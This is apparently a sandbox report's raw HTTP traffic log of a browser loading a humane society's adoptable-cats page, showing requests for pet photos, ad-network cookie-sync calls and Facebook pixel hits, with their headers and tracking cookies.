Source: global trafficHTTP traffic detected: GET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1Host: leatherbook.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dmp/asyncPixelSync HTTP/1.1Host: pixel-sync.sitescout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ssuma=eyIyIjoxNzM2Mzg3OTU3OTQ1LCI0IjoxNzM2Mzg3OTU3OTQ1LCIzOSI6MTczNjM4Nzk1Nzk0NSwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NX0; ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597
Source: global trafficHTTP traffic detected: GET /photos/352/e814d785-2335-404a-8a20-0cb3ae2c5441.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/9c7b31b0-07c0-40bd-b310-3075efde3ec6.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/Photo-Not-Available-cat.gif HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/9f9246f1-3d7b-48bd-a446-e54427acddec.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/6ff84da6-dadf-4c18-b0cb-b36ae750aa72.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/86630945-fa46-44bc-bf53-730648f81adc.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/d48e2ad2-00c5-4dee-acb5-efe4acd00f0a.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/6a80bfbe-5e6a-4206-8bd9-f6497d49bc0c.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /engine?du=73;csync=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553 HTTP/1.1Host: fei.pro-market.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537072977&val=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/0bc6f3ec-9651-4981-852c-606c251e94f3.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5NjkmdGw9MTI5NjAw&piggybackCookie=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /up/a9d63b08fec1b65f?cntr_url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F HTTP/1.1Host: pixel.sitescout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger=navigation-source, event-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597; _ssuma=eyI0NSI6MTczNjM4Nzk2NTc0MCwiMiI6MTczNjM4Nzk1Nzk0NSwiNjgiOjE3MzYzODc5NjU3NDAsIjQiOjE3MzYzODc5NTc5NDUsIjM5IjoxNzM2Mzg3OTU3OTQ1LCIxNyI6MTczNjM4Nzk2NTc0MCwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NSwiNTMiOjE3MzYzODc5NjU3NDAsIjQyIjoxNzM2Mzg3OTY1NzQwfQ
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=ssc&google_hm=SYScIzQoRVihlt4vcJdW7Gd_LXU HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmgi_KaV_vmCIXRWAviJHfF6XtRvGpgrnd-sNzLOh9Yn-8cB-EiNAq9VlvF
Source: global trafficHTTP traffic detected: GET /photos/352/45e9cc7f-8a67-4e62-aa35-92ae279c9453.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/f5d5ba8d-c5e9-485f-8040-a2ad6fa39444.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/fdac7120-64a7-4244-8d9a-cd8706ac5427.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /setuid?entity=133&code=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387965322&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/42822d30-5fc7-4b46-8640-effba9e4ddde.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/9c7b31b0-07c0-40bd-b310-3075efde3ec6.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/6ff84da6-dadf-4c18-b0cb-b36ae750aa72.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/a66346fd-1c41-4492-b9c9-20a54b4e16d2.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?cc=1&id=537072977&val=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=083d9128-a88d-464c-a2e4-d0081c094869|1736387966
Source: global trafficHTTP traffic detected: GET /engine?du=73;csync=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553 HTTP/1.1Host: fei.pro-market.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: anProfile="-kfgf7cexu741+1+1f=1+1g=1+1j=57:1+rs=s+rt=082E7BBD+s2=(spstj2)+vm=73-49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553"
Source: global trafficHTTP traffic detected: GET /photos/352/26812b91-7e9f-4bee-913c-af37d8f79f54.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/992893bc-1286-43f9-9f38-1674ef2cec80.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5NjkmdGw9MTI5NjAw&piggybackCookie=49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: image2.pubmatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KRTBCOOKIE_188=3189-49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&KRTB&23418-49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553&KRTB&23634-49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553; PugT=1736387966
Source: global trafficHTTP traffic detected: GET /photos/352/6a80bfbe-5e6a-4206-8bd9-f6497d49bc0c.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /up/a9d63b08fec1b65f?cntr_url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F HTTP/1.1Host: pixel.sitescout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597; _ssuma=eyI0NSI6MTczNjM4Nzk2NTc0MCwiMiI6MTczNjM4Nzk1Nzk0NSwiNjgiOjE3MzYzODc5NjU3NDAsIjQiOjE3MzYzODc5NTc5NDUsIjM5IjoxNzM2Mzg3OTU3OTQ1LCIxNyI6MTczNjM4Nzk2NTc0MCwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NSwiNTMiOjE3MzYzODc5NjU3NDAsIjQyIjoxNzM2Mzg3OTY1NzQwfQ
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D133%26code%3D49849c23-3428-4558-a196-de2f709756ec-677f2d75-5553%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=ySfdXF1sN9r84uChLP812RfgQ25JoexTbm2m3Jd52HcU-POEXG7hKKEwL17k1uOyDzEPpx2xMJSGRXDrm1QmL-I1irucQ8TUEJjbi2hv-yM.; receive-cookie-deprecation=1; uuid2=3411804901976268155
